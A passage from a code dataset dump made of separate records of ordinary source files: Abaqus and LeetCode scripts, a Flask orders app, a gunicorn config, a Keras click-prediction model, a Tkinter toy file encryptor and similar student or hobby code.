engineeringFeatures=ON)\nsession.viewports['Viewport: 1'].partDisplay.geometryOptions.setValues(\n referenceRepresentation=OFF)\np1 = mdb.models['Model-1'].parts['Frame']\nsession.viewports['Viewport: 1'].setValues(displayedObject=p1)\n#: The contents of viewport \"Viewport: 1\" have been copied to the clipboard.\n#: The contents of viewport \"Viewport: 1\" have been copied to the clipboard.\na = mdb.models['Model-1'].rootAssembly\nsession.viewports['Viewport: 1'].setValues(displayedObject=a)\nsession.viewports['Viewport: 1'].assemblyDisplay.setValues(loads=OFF, bcs=OFF, \n predefinedFields=OFF, connectors=OFF)\na = mdb.models['Model-1'].rootAssembly\na.DatumCsysByDefault(CARTESIAN)\np = mdb.models['Model-1'].parts['Frame']\na.Instance(name='Frame-1', part=p, dependent=ON)\nsession.viewports['Viewport: 1'].assemblyDisplay.setValues(loads=ON, bcs=ON, \n predefinedFields=ON, connectors=ON)\nsession.viewports['Viewport: 1'].assemblyDisplay.setValues(step='Initial')\na = mdb.models['Model-1'].rootAssembly\nv1 = a.instances['Frame-1'].vertices\nverts1 = v1.getSequenceFromMask(mask=('[#4 ]', ), )\nregion = a.Set(vertices=verts1, name='Set-1')\nmdb.models['Model-1'].DisplacementBC(name='Fixed', createStepName='Initial', \n region=region, u1=SET, u2=SET, ur3=UNSET, amplitude=UNSET, \n distributionType=UNIFORM, fieldName='', localCsys=None)\na = mdb.models['Model-1'].rootAssembly\nv1 = a.instances['Frame-1'].vertices\nverts1 = v1.getSequenceFromMask(mask=('[#10 ]', ), )\nregion = a.Set(vertices=verts1, name='Set-2')\nmdb.models['Model-1'].DisplacementBC(name='BC-2', createStepName='Initial', \n region=region, u1=UNSET, u2=SET, ur3=UNSET, amplitude=UNSET, \n distributionType=UNIFORM, fieldName='', localCsys=None)\nsession.viewports['Viewport: 1'].assemblyDisplay.setValues(step='Apply load')\n#: The contents of viewport \"Viewport: 1\" have been copied to the clipboard.\na = mdb.models['Model-1'].rootAssembly\nv1 = a.instances['Frame-1'].vertices\nverts1 = v1.getSequenceFromMask(mask=('[#8 ]', ), )\nregion = a.Set(vertices=verts1, name='Set-3')\nmdb.models['Model-1'].ConcentratedForce(name='Force', \n createStepName='Apply load', region=region, cf2=-10000.0, \n distributionType=UNIFORM, field='', localCsys=None)\np1 = mdb.models['Model-1'].parts['Frame']\nsession.viewports['Viewport: 1'].setValues(displayedObject=p1)\nsession.viewports['Viewport: 1'].partDisplay.setValues(sectionAssignments=OFF, \n engineeringFeatures=OFF, mesh=ON)\nsession.viewports['Viewport: 1'].partDisplay.meshOptions.setValues(\n meshTechnique=ON)\nmdb.meshEditOptions.setValues(enableUndo=True, maxUndoCacheElements=0.5)\n#: The contents of viewport \"Viewport: 1\" have been copied to the clipboard.\n#: The contents of viewport \"Viewport: 1\" have been copied to the clipboard.\nsession.viewports['Viewport: 1'].partDisplay.setValues(sectionAssignments=ON, \n engineeringFeatures=ON, mesh=OFF)\nsession.viewports['Viewport: 1'].partDisplay.meshOptions.setValues(\n meshTechnique=OFF)\nsession.viewports['Viewport: 1'].partDisplay.setValues(sectionAssignments=OFF, \n engineeringFeatures=OFF, mesh=ON)\nsession.viewports['Viewport: 1'].partDisplay.meshOptions.setValues(\n meshTechnique=ON)\n#: The contents of viewport \"Viewport: 1\" have been copied to the clipboard.\nelemType1 = mesh.ElemType(elemCode=T2D2, elemLibrary=STANDARD)\np = mdb.models['Model-1'].parts['Frame']\ne = p.edges\nedges = e.getSequenceFromMask(mask=('[#7f ]', ), )\npickedRegions =(edges, )\np.setElementType(regions=pickedRegions, elemTypes=(elemType1, ))\nsession.viewports['Viewport: 1'].view.setValues(nearPlane=4.06172, \n farPlane=4.65608, width=1.95683, height=0.971544, viewOffsetX=-0.00133005, \n viewOffsetY=-0.00199512)\np = mdb.models['Model-1'].parts['Frame']\np.seedPart(size=1.0, deviationFactor=0.1, minSizeFactor=0.1)\np = mdb.models['Model-1'].parts['Frame']\np.generateMesh()\n#: The contents of viewport \"Viewport: 1\" have been copied to the clipboard.\na = mdb.models['Model-1'].rootAssembly\na.regenerate()\nsession.viewports['Viewport: 1'].setValues(displayedObject=a)\nsession.viewports['Viewport: 1'].assemblyDisplay.setValues(loads=OFF, bcs=OFF, \n predefinedFields=OFF, connectors=OFF)\nmdb.Job(name='Frame', model='Model-1', \n description='Two-dimensional overhead hoist frame', type=ANALYSIS, \n atTime=None, waitMinutes=0, waitHours=0, queue=None, memory=50, \n memoryUnits=PERCENTAGE, getMemoryFromAnalysis=True, \n explicitPrecision=SINGLE, nodalOutputPrecision=SINGLE, echoPrint=OFF, \n modelPrint=OFF, contactPrint=OFF, historyPrint=OFF, userSubroutine='', \n scratch='', multiprocessingMode=DEFAULT, numCpus=1, numGPUs=0)\nmdb.jobs['Frame'].submit(consistencyChecking=OFF, datacheckJob=True)\n#: The job input file \"Frame.inp\" has been submitted for analysis.\n#: Error in job Frame: Unable to change the current working directory to C:\\Users\\Anzong\\AppData\\Local\\Temp\\Anzong_Frame_6708. \n#: Job Frame aborted due to errors.\nmdb.save()\n#: The model database has been saved to \"C:\\Users\\Anzong\\Desktop\\test.cae\".\n","sub_path":"Abaqus/2015-1-20-Abaqus CAE - Example/2015-1-18-A overhead hoist example/abaqus.rpy","file_name":"abaqus.rpy","file_ext":"rpy","file_size_in_byte":8661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"187224300","text":"class Solution(object):\n def letterCasePermutation(self, S):\n \"\"\"\n :type S: str\n :rtype: List[str]\n \"\"\"\n res = []\n def dfs(i, S, temp):\n if i==len(S):\n res.append(\"\".join(temp))\n return\n if S[i].isalpha():\n temp.append(S[i].lower())\n dfs(i+1, S, temp)\n temp.pop()\n temp.append(S[i].upper())\n dfs(i+1, S, temp)\n temp.pop()\n else:\n temp.append(S[i])\n dfs(i+1, S, temp)\n temp.pop()\n dfs(0, S, [])\n return res\n","sub_path":"Leetcode/dfs_recursion_backtracking/784_LetterCasePermutation/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"421389487","text":"import pandas as pd\n\nuser_history_dict = dict()\ntrain_data = []\nitem_corpus = []\ncorpus_index = dict()\nwith open(\"train.txt\", \"r\") as fid:\n for line in fid:\n splits = line.strip().split()\n user_id = splits[0]\n items = splits[1:]\n user_history_dict[user_id] = items\n for item in items:\n if item not in corpus_index:\n corpus_index[item] = len(corpus_index)\n item_corpus.append([corpus_index[item], item])\n history = user_history_dict[user_id].copy()\n history.remove(item)\n train_data.append([user_id, corpus_index[item], 1, user_id, \"^\".join(history)])\ntrain = pd.DataFrame(train_data, columns=[\"query_index\", \"corpus_index\", \"label\", \"user_id\", \"user_history\"])\nprint(\"train samples:\", len(train))\ntrain.to_csv(\"train.csv\", index=False)\n\ntest_data = []\nwith open(\"test.txt\", \"r\") as fid:\n for line in fid:\n splits = line.strip().split()\n user_id = splits[0]\n items = splits[1:]\n for item in items:\n if item not in corpus_index:\n corpus_index[item] = len(corpus_index)\n item_corpus.append([corpus_index[item], item])\n history = user_history_dict[user_id].copy()\n test_data.append([user_id, corpus_index[item], 1, user_id, \"^\".join(history)])\ntest = pd.DataFrame(test_data, columns=[\"query_index\", \"corpus_index\", \"label\", \"user_id\", \"user_history\"])\nprint(\"test samples:\", len(test))\ntest.to_csv(\"test.csv\", index=False)\n\ncorpus = pd.DataFrame(item_corpus, columns=[\"corpus_index\", \"item_id\"])\nprint(\"number of items:\", len(item_corpus))\ncorpus = corpus.set_index(\"corpus_index\")\ncorpus.to_csv(\"item_corpus.csv\", index=False)","sub_path":"datasets/Gowalla/Gowalla_m1/MatchBox_data_converter.py","file_name":"MatchBox_data_converter.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"286187585","text":"import os\nimport gevent.monkey\ngevent.monkey.patch_all()\n\nimport multiprocessing\n\ndebug = True\nloglevel = 'debug'\nbind = '0.0.0.0:9000'\npidfile='/var/log/gunicorn/scrumpid.log'\nerrorlog='/var/log/gunicorn/error.log'\naccesslog='/var/log/gunicorn/access.log'\n\n# processing num\nworkers = 2\nworker_class = 'gunicorn.workers.ggevent.GeventWorker'\n\nx_forwarded_for_header = 'X-FORWARDED-FOR'\n\n","sub_path":"websocketapi/gun.py","file_name":"gun.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"466105629","text":"# @Time : 2019/6/10 13:26\n# @Author : Xu Huipeng\n# @Blog : https://brycexxx.github.io/\n\n\n# Definition for a Node.\nclass Node:\n def __init__(self, val, left, right, next):\n self.val = val\n self.left = left\n self.right = right\n self.next = next\n\n\nclass Solution:\n def connect(self, root: 'Node') -> 'Node':\n first = root\n\n def helper(node: Node) -> None:\n if len(stack) == 0:\n stack.append(node)\n else:\n cur = stack.pop()\n cur.next = node\n stack.append(node)\n\n while first:\n next_ = first\n stack = []\n while next_:\n if next_.left:\n helper(next_.left)\n if next_.right:\n helper(next_.right)\n next_ = next_.next\n while first and not first.left and not first.right:\n first = first.next\n if first and first.left:\n first = first.left\n elif first and first.right:\n first = first.right\n return root\n\n def connect1(self, root: 'Node') -> 'Node':\n first = root\n while first:\n while first and not first.left and not first.right:\n first = first.next\n if not first: break\n next_, cur = first, None\n while next_:\n if next_.left:\n if cur:\n cur.next = next_.left\n cur = next_.left\n if next_.right:\n if cur:\n cur.next = next_.right\n cur = next_.right\n next_ = next_.next\n first = first.left if first.left else first.right\n return root\n","sub_path":"connectTwo.py","file_name":"connectTwo.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"519043593","text":"from flask import Flask, render_template, request\nfrom sqlalchemy import create_engine, MetaData, Table, Column, Integer, String\nengine = create_engine('sqlite:///orders.db', echo = True)\nmeta = MetaData()\n\n\norders = Table('orders', meta,\n Column('id', Integer, primary_key=True),\n Column('name', String),\n Column('company', String),\n Column('cost', Integer)\n )\n\nmeta.create_all(engine)\n\n\napp = Flask(__name__)\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n conn=engine.connect()\n db_urls = conn.execute('SELECT * FROM orders').fetchall()\n if request.method == 'POST':\n name = request.form['name']\n company = request.form['company']\n cost = request.form['cost']\n ins = orders.insert()\n ins = orders.insert().values(name=name, company=company, cost=cost)\n result = conn.execute(ins)\n return render_template('index.html', name=name, data=db_urls)\n\n return render_template('index.html', data=db_urls)\n\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"432302587","text":"#\n# File Header\n#\n# Add your name to this\n\n# Define a function called piggy(string) that returns a string\npiggy = \"string\"\n\ndef piggy(word):\n\t\n\t# Magic Happens Here\n\tpig = word\n\t# Ignore previous line\n\t\n\treturn pig\n\n# Open the file *getty.txt* for reading. \nget = open(\"getty.txt\",\"r\")\n\n# Open a new file *piggy.txt* for writing. \npiggyfile = open(\"piggy.txt\",\"w\")\n\n# Read the getty.txt file into a string. \ngetstr = get.read()\n\n# Strip out bad characters (, - .). \ngetstr = getstr.replace (',','')\ngetstr = getstr.replace ('-','')\ngetstr = getstr.replace ('.','')\n\n# Split the string into a list of words. \ngetlist = getstr.split()\n\n# Create a new empty string. \nnewstr = \"\"\n\n# Loop through the list of words, pigifying each one. \nfor word in getlist:\n\tnewword = word [::-1]\n\tnewstr = newstr + newword + \" \"\n\t\n\n# Add the pigified word (and a space) to the new string. \noutfile = open(\"piggy.txt\",\"w\")\n\n# Write the new string to piggy.txt. \nprint (newstr, getlist, outfile)\n\n# close the files.\noutfile.close()\nget.close()","sub_path":"piggetty.py","file_name":"piggetty.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"518867155","text":"from Tkinter import *\nfrom ScrolledText import ScrolledText\nimport random\nimport os\nheading = ('Courier', 15)\nnormal = ('Courier', 13)\n\nroot = Tk()\n\n\ndef shift(current, new, *args):\n current.grid_remove()\n new.grid()\n if args:\n for i in args:\n try:\n i.delete(0, END)\n except TclError:\n i.delete('0.0', END)\n args[0].focus()\n\n\ndef gen_key():\n key = ''\n for i in range(8):\n char = random.randrange(33, 127)\n char = chr(char)\n key += char\n return key\n\n\ndef offset(key):\n factor = sum(ord(i) for i in key)\n factor /= 8\n return factor - 32\n\n\ndef encryption(key, number):\n text = to_e.get()\n save = e_save.get()\n if os.path.exists(text):\n if os.path.getsize(text) <= 45 * 1024:\n try:\n newtext = open(save, 'w')\n factor = offset(key)\n changed = (option1(text, factor), option2(text, factor))[number]\n newtext.write(changed)\n newtext.close()\n return\n except:\n e_save.delete(0, END)\n e_save.insert(END, 'Invalid file address')\n else:\n to_e.delete(0, END)\n to_e.insert(END, 'File over 45Kb')\n else:\n to_e.delete(0, END)\n to_e.insert(END, 'Invalid filename')\n\n\ndef option1(text, factor):\n plain = open(text, 'r')\n cipher = ''\n for char in plain.read():\n if char not in (' ', '\\n'):\n char = ord(char) + factor\n if char > 126:\n char -= 94\n char = chr(char)\n cipher += char\n plain.close()\n return cipher\n\n\ndef option2(text, factor):\n plain = open(text, 'r')\n cipher = ''\n for char in plain.read().replace(' ', ''):\n if char != '\\n':\n if (len(cipher.replace('\\n', '')) - 5) % 6 == 0:\n cipher += ' '\n char = ord(char) + factor\n if char > 126:\n char -= 94\n char = chr(char)\n cipher += char\n plain.close()\n return cipher\n\n\ndef decryption():\n text = to_d.get()\n key = getkey.get()\n if os.path.exists(text):\n if len(key) == 8:\n cipher = open(text, 'r')\n factor = offset(key)\n plain = ''\n for char in cipher.read():\n if char not in (' ', '\\n'):\n char = ord(char) - factor\n if char < 33:\n char += 94\n char = chr(char)\n plain += char\n cipher.close()\n plaintext.delete('0.0', END)\n plaintext.insert(END, plain)\n return\n getkey.delete(0, END)\n getkey.insert(END, 'Invalid key')\n else:\n to_d.delete(0, END)\n to_d.insert(END, 'Invalid file address')\n\n\ndef en_screen(number=0):\n Label(e_frame, text='Encryption %d' % (number + 1), font=heading).grid(row=0, column=0, columnspan=2, padx=100, pady=10)\n key = Label(e_frame, text=gen_key(), bg='deepskyblue', font=normal)\n key.grid(row=2, column=1, padx=5, pady=5, sticky=W)\n Button(e_frame, text='Encrypt', font=normal, width=12, command=lambda: encryption(key.cget('text'), number)).grid(row=4, column=0, padx=5, pady=5)\n e_frame.grid()\n shift(start, e_frame, to_e, e_save)\n\n\ne_frame = Frame(root)\nLabel(e_frame, text='Text file to encrypt:', font=normal).grid(row=1, column=0, padx=5, pady=5, sticky=W)\nto_e = Entry(e_frame, width=25, bg='pale goldenrod', font=normal)\nto_e.grid(row=1, column=1, padx=5, pady=5, sticky=W)\nLabel(e_frame, text='Key:', font=normal).grid(row=2, column=0, padx=5, pady=5, sticky=W)\nLabel(e_frame, text='Save ciphertext to:', font=normal).grid(row=3, column=0, padx=5, pady=5, sticky=W)\ne_save = Entry(e_frame, width=25, bg='pale goldenrod', font=normal)\ne_save.grid(row=3, column=1, padx=5, pady=5, sticky=W)\nButton(e_frame, text='Back to menu', font=normal, width=12, command=lambda: shift(e_frame, start)).grid(row=4, column=1, padx=5, pady=5)\n\nd_frame = Frame(root)\nLabel(d_frame, text='Decryption', font=heading).grid(row=0, column=0, columnspan=2, padx=100, pady=10)\nLabel(d_frame, text='Text file to decrypt:', font=normal).grid(row=1, column=0, padx=5, pady=5, sticky=W)\nto_d = Entry(d_frame, width=25, bg='pale goldenrod', font=normal)\nto_d.grid(row=1, column=1, padx=5, pady=5, sticky=W)\nLabel(d_frame, text='Key:', font=normal).grid(row=2, column=0, padx=5, pady=5, sticky=W)\ngetkey = Entry(d_frame, width=25, bg='pale goldenrod', font=normal)\ngetkey.grid(row=2, column=1, padx=5, pady=5, sticky=W)\nLabel(d_frame, text='Plaintext:', font=normal).grid(row=3, column=0, padx=5, pady=5, sticky=N+W)\nplaintext = ScrolledText(d_frame, height=5, width=29, bg='deepskyblue', wrap=WORD)\nplaintext.grid(row=3, column=1, padx=5, pady=5, sticky=W)\nButton(d_frame, text='Decrypt', font=normal, width=12, command=decryption).grid(row=4, column=0, pady=10)\nButton(d_frame, text='Back to menu', font=normal, width=12, command=lambda: shift(d_frame, start)).grid(row=4, column=1, pady=10)\n\ninstruct = Frame(root)\nLabel(instruct, text=\"How to use the program\", font=heading).grid(row=0, column=0, padx=100, pady=10)\ndescriptions = Text(instruct, font=normal, width=50, height=15, wrap=WORD)\ndescriptions.insert(END, \"The encrypt options encrypt the text file given by a random 8 character long key. \")\ndescriptions.insert(END, \"The result is then saved to the file address given by the user. \")\ndescriptions.insert(END, \"Remember to include the ending!\")\ndescriptions.insert(END, \"\\n- 'Encryption 1' does this without changing the length of the words.\")\ndescriptions.insert(END, \"\\n- 'Encryption 2' groups blocks of 5 characters together and separates them with spaces.\")\ndescriptions.insert(END, \"\\n\\n'Decryption' decrypts the text file name given by the key inputted by the user. \")\ndescriptions.insert(END, \"Like in the encrypt options, the result is saved to the file address given by the user.\")\ndescriptions.insert(END, \"\\n\\nAnd the 'How to use' option is how you got here!\")\ndescriptions.grid(row=1, column=0, columnspan=2, padx=5, pady=5, sticky=W)\nButton(instruct, text='Back to menu', font=normal, width=12, command=lambda: shift(instruct, start)).grid(row=2, column=0, pady=5)\n\nstart = Frame(root)\nstart.grid()\nLabel(start, text='Options', font=heading).grid(row=0, column=0, columnspan=2, padx=50, pady=10)\nButton(start, text='Encryption 1', font=normal, width=12, command=en_screen).grid(row=1, column=0, padx=5, pady=5)\nButton(start, text='Encryption 2', font=normal, width=12, command=lambda: en_screen(1)).grid(row=1, column=1, padx=5, pady=5)\nButton(start, text='Decryption', font=normal, width=12, command=lambda: shift(start, d_frame, to_d, getkey, plaintext)).grid(row=2, column=0, padx=5, pady=5)\nButton(start, text='How to use', font=normal, width=12, command=lambda: shift(start, instruct)).grid(row=2, column=1, padx=5, pady=5)\n\nroot.mainloop()","sub_path":"GCSE Coursework/Traditional.py","file_name":"Traditional.py","file_ext":"py","file_size_in_byte":6973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"173925507","text":"from celery import task\r\nfrom django.core.mail import send_mail\r\nfrom .models import Order\r\n\r\n\r\n@task\r\ndef OrderCreated(order_id):\r\n\torder = Order.objects.get(id=order_id)\r\n\tsubject = f'Заказ с номером {order.id}'\r\n\tmessage = f'{order.first_name}, вы успешно сделали заказ.\\n \\\r\n\t\t\t\t\tНомер вашего заказа {order.id}'\r\n\tmail_send = send_mail(subject, message, 'admin@myshop.ru', [order.email])\r\n\treturn mail_send\r\n","sub_path":"my_shop/orders/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"54623103","text":"import pandas as pd\nimport numpy as np\nimport os\nos.environ['OMP_NUM_THREADS'] = '4'\nimport gc\n\nimport keras\nimport tensorflow as tf\n\n# set gpu usage\nconfig = tf.ConfigProto(gpu_options=tf.GPUOptions(visible_device_list=\"0\",\n allow_growth=True))\nsession = tf.Session(config=config)\nkeras.backend.tensorflow_backend.set_session(session)\n\ndtypes = {\n 'ip' : 'uint32',\n 'app' : 'uint16',\n 'device' : 'uint16',\n 'os' : 'uint16',\n 'channel' : 'uint16',\n 'is_attributed' : 'uint8',\n 'click_id' : 'uint32'\n }\nprint('load train....')\ntrain_df = pd.read_pickle(\"./data/training.pkl.gz\")\nval_df = pd.read_pickle(\"./data/validation.pkl.gz\")\n\nprint('load test....')\ntest_cols = ['ip', 'app', 'device', 'os', 'click_time', 'channel', 'click_id']\ntest_df = pd.read_csv(\"./data/test.csv\", dtype=dtypes, usecols=test_cols)\n\n\nlen_train = len(train_df)\nlen_test = len(test_df)\ntrain_df = train_df.append(val_df)\ntrain_df=train_df.append(test_df)\ndel test_df\ndel val_df\ngc.collect()\n\ntrain_df['click_time']= pd.to_datetime(train_df['click_time'])\n\nprint('click time....')\ntrain_df['click_time'] = (train_df['click_time'].astype(np.int64) // 10 ** 9).astype(np.int32)\ntrain_df['next_click'] = (train_df.groupby(['ip', 'app', 'device', 'os']).click_time.shift(-1) - train_df.click_time).astype(np.float32)\ntrain_df['next_click'].fillna((train_df['next_click'].mean()), inplace=True)\n\nprint('hour, day, wday....')\ntrain_df['hour'] = pd.to_datetime(train_df.click_time).dt.hour.astype('uint8')\ntrain_df['day'] = pd.to_datetime(train_df.click_time).dt.day.astype('uint8')\ntrain_df['wday'] = pd.to_datetime(train_df.click_time).dt.dayofweek.astype('uint8')\n\nprint('grouping by ip-day-hour combination....')\nfname = 'qty'\ngp = train_df[['ip','day','hour','channel']].groupby(by=['ip','day','hour'])[['channel']].count().reset_index().rename(index=str, columns={'channel': fname})\ntrain_df = train_df.merge(gp, on=['ip','day','hour'], how='left')\ntrain_df[fname] = train_df[fname].astype('uint16')\ntrain_df[fname] = train_df[fname].values / np.max(train_df[fname].values)\ntrain_df[fname] = train_df[fname].astype('float32')\ndel gp; gc.collect()\n\nprint('group by ip-app combination....')\nfname = 'ip_app_count'\ngp = train_df[['ip','app', 'channel']].groupby(by=['ip', 'app'])[['channel']].count().reset_index().rename(index=str, columns={'channel': fname})\ntrain_df = train_df.merge(gp, on=['ip','app'], how='left')\ntrain_df[fname] = train_df[fname].astype('uint16')\ntrain_df[fname] = train_df[fname].values / np.max(train_df[fname].values)\ntrain_df[fname] = train_df[fname].astype('float32')\ndel gp; gc.collect()\n\nprint('group by ip-app-os combination....')\nfname = 'ip_app_os_count'\ngp = train_df[['ip','app', 'os', 'channel']].groupby(by=['ip', 'app', 'os'])[['channel']].count().reset_index().rename(index=str, columns={'channel': fname})\ntrain_df = train_df.merge(gp, on=['ip','app', 'os'], how='left')\ntrain_df[fname] = train_df[fname].astype('uint16')\ntrain_df[fname] = train_df[fname].values / np.max(train_df[fname].values)\ntrain_df[fname] = train_df[fname].astype('float32')\ndel gp; gc.collect()\n\nprint('group by : ip_day_test_hh')\nfname = \"nip_day_test_hh\"\nmost_freq_hours_in_test_data = [4, 5, 9, 10, 13, 14]\nleast_freq_hours_in_test_data = [6, 11, 15]\ntrain_df['in_test_hh'] = ( 3 \n - 2*train_df['hour'].isin( most_freq_hours_in_test_data ) \n - 1*train_df['hour'].isin( least_freq_hours_in_test_data ) ).astype('uint8')\ngp = train_df[['ip', 'day', 'in_test_hh', 'channel']].groupby(by=['ip', 'day',\n 'in_test_hh'])[['channel']].count().reset_index().rename(index=str, \n columns={'channel': fname})\ntrain_df = train_df.merge(gp, on=['ip','day','in_test_hh'], how='left')\ndel gp\ntrain_df.drop(['in_test_hh'], axis=1, inplace=True)\ntrain_df[fname] = train_df[fname].astype('uint32')\ntrain_df[fname] = train_df[fname].values / np.max(train_df[fname].values)\ntrain_df[fname] = train_df[fname].astype('float32')\ngc.collect()\n\nprint('group by ip-app-os combination....')\nfname = 'ip_ch_ncount'\ngp = train_df[['ip', 'channel']].groupby(by=['ip'])[['channel']].nunique().reset_index().rename(index=str, columns={'channel': fname})\ntrain_df = train_df.merge(gp, on=['ip'], how='left')\ntrain_df[fname] = train_df[fname].astype('uint16')\ntrain_df[fname] = train_df[fname].values / np.max(train_df[fname].values)\ntrain_df[fname] = train_df[fname].astype('float32')\ndel gp; gc.collect()\n\nprint('group by ip-app-os combination....')\nfname = 'ip_day_hour_ncount'\ngp = train_df[['ip', 'day', 'hour']].groupby(by=['ip', 'day'])[['hour']].nunique().reset_index().rename(index=str, columns={'hour': fname})\ntrain_df = train_df.merge(gp, on=['ip', 'day'], how='left')\ntrain_df[fname] = train_df[fname].astype('uint16')\ntrain_df[fname] = train_df[fname].values / np.max(train_df[fname].values)\ntrain_df[fname] = train_df[fname].astype('float32')\ndel gp; gc.collect()\n\nprint(\"label encoding....\")\nfrom sklearn.preprocessing import LabelEncoder\ntrain_df[['app','device','os', 'channel', 'hour', 'day', 'wday']].apply(LabelEncoder().fit_transform)\n\nprint ('final part of preparation....')\ntest_df = train_df.iloc[-len_test:]\nval_df = train_df.iloc[len_train:-len_test]\ntrain_df = train_df.iloc[:len_train]\ny_train = train_df['is_attributed'].values\ny_val = val_df['is_attributed'].values\ntrain_df.drop(['click_id', 'click_time','ip','is_attributed'],1,inplace=True)\nval_df.drop(['click_id', 'click_time','ip','is_attributed'],1,inplace=True)\ngc.collect()\n\n\nprint ('neural network....')\nfrom keras.layers import Input, Embedding, Dense, Flatten, Dropout, concatenate\nfrom keras.layers import BatchNormalization, SpatialDropout1D, Conv1D\nfrom keras.callbacks import Callback\nfrom keras.models import Model\nfrom keras.optimizers import Adam\n\nmax_app = np.max([train_df['app'].max(), test_df['app'].max()])+1\nmax_ch = np.max([train_df['channel'].max(), test_df['channel'].max()])+1\nmax_dev = np.max([train_df['device'].max(), test_df['device'].max()])+1\nmax_os = np.max([train_df['os'].max(), test_df['os'].max()])+1\nmax_h = np.max([train_df['hour'].max(), test_df['hour'].max()])+1\nmax_d = np.max([train_df['day'].max(), test_df['day'].max()])+1\nmax_wd = np.max([train_df['wday'].max(), test_df['wday'].max()])+1\ndef get_keras_data(dataset):\n X = {\n 'app': np.array(dataset.app),\n 'ch': np.array(dataset.channel),\n 'dev': np.array(dataset.device),\n 'os': np.array(dataset.os),\n 'h': np.array(dataset.hour),\n 'd': np.array(dataset.day),\n 'wd': np.array(dataset.wday),\n 'qty': np.array(dataset.qty),\n 'c1': np.array(dataset.ip_app_count),\n 'c2': np.array(dataset.ip_app_os_count), \n \"c3\": np.array(dataset.nip_day_test_hh), \n \"c4\": np.array(dataset.ip_ch_ncount), \n \"c5\": np.array(dataset.ip_day_hour_ncount), \n 'nc': np.array(dataset.next_click)\n }\n return X\ntrain_df = get_keras_data(train_df)\nval_df = get_keras_data(val_df)\n\nemb_n = 50\ndense_n = 1000\nin_app = Input(shape=[1], name = 'app')\nemb_app = Embedding(max_app, emb_n)(in_app)\nin_ch = Input(shape=[1], name = 'ch')\nemb_ch = Embedding(max_ch, emb_n)(in_ch)\nin_dev = Input(shape=[1], name = 'dev')\nemb_dev = Embedding(max_dev, emb_n)(in_dev)\nin_os = Input(shape=[1], name = 'os')\nemb_os = Embedding(max_os, emb_n)(in_os)\nin_h = Input(shape=[1], name = 'h')\nemb_h = Embedding(max_h, emb_n)(in_h) \nin_d = Input(shape=[1], name = 'd')\nemb_d = Embedding(max_d, emb_n)(in_d) \nin_wd = Input(shape=[1], name = 'wd')\nemb_wd = Embedding(max_wd, emb_n)(in_wd)\n\nin_qty = Input(shape=[1], name = 'qty')\nin_c1 = Input(shape=[1], name = 'c1')\nin_c2 = Input(shape=[1], name = 'c2')\nin_c3 = Input(shape=[1], name = 'c3')\nin_c4 = Input(shape=[1], name = 'c4')\nin_c5 = Input(shape=[1], name = 'c5')\nin_nc = Input(shape=[1], name = 'nc')\nfe = concatenate([(emb_app), (emb_ch), (emb_dev), (emb_os), (emb_h), \n (emb_d), (emb_wd)])\ns_dout = SpatialDropout1D(0.2)(fe)\nconv = Conv1D(100, kernel_size=4, strides=1, padding='same')(s_dout)\nconcat = concatenate([Flatten()(s_dout), Flatten()(conv), (in_nc), (in_qty), (in_c1), (in_c2), (in_c3),\n (in_c4), (in_c5)])\nx = Dropout(0.2)(Dense(dense_n,activation='relu')(concat))\nx = Dropout(0.2)(Dense(dense_n,activation='relu')(x))\noutp = Dense(1,activation='sigmoid')(x)\nmodel = Model(inputs=[in_app,in_ch,in_dev,in_os,in_h,in_d,in_wd,in_qty,in_c1,in_c2,in_c3,in_c4,in_c5,in_nc], outputs=outp)\n\nbatch_size = 50000\nepochs = 2\nexp_decay = lambda init, fin, steps: (init/fin)**(1/(steps-1)) - 1\nsteps = int(len(list(train_df)[0]) / batch_size) * epochs\nlr_init, lr_fin = 0.002, 0.0002\nlr_decay = exp_decay(lr_init, lr_fin, steps)\noptimizer_adam = Adam(lr=0.002, decay=lr_decay)\nmodel.compile(loss='binary_crossentropy',optimizer=optimizer_adam,metrics=['accuracy'])\n\nmodel.summary()\n\nclass_weight = {0:.01,1:.99} # magic\nmodel.fit(train_df, y_train, batch_size=batch_size, epochs=2, class_weight=class_weight,\n shuffle=True, verbose=2)\ndel train_df, y_train, y_val; gc.collect()\nmodel.save_weights('imbalanced_data.h5')\n\nsub = pd.DataFrame()\nsub['click_id'] = test_df['click_id'].astype('int')\ntest_df.drop(['click_id', 'click_time','ip','is_attributed'],1,inplace=True)\ntest_df = get_keras_data(test_df)\n\nprint(\"predicting....\")\nsub['is_attributed'] = model.predict(test_df, batch_size=batch_size, verbose=2).reshape(-1)\ndel test_df; gc.collect()\nprint(\"writing....\")\nsub.to_csv('nn2_sub.csv.gz', float_format='%.8f',index=False,compression='gzip')\n\ndel sub\ngc.collect()\n\nres_val = pd.DataFrame()\nres_val['is_attributed'] = model.predict(val_df, batch_size=batch_size, verbose=2).reshape(-1)\ndel val_df\ngc.collect()\nres_val.to_csv('nn2_val.csv.gz', float_format='%.8f',index=False,compression='gzip')\nprint(\"done\")\n","sub_path":"scripts/alexnn_dense.py","file_name":"alexnn_dense.py","file_ext":"py","file_size_in_byte":9915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"651851575","text":"import pygame\n\nfrom camera import *\n\ndef RelRect(x,y,w,h,camera):\n return pygame.Rect(x-camera.rect.x, y-camera.rect.y, w, 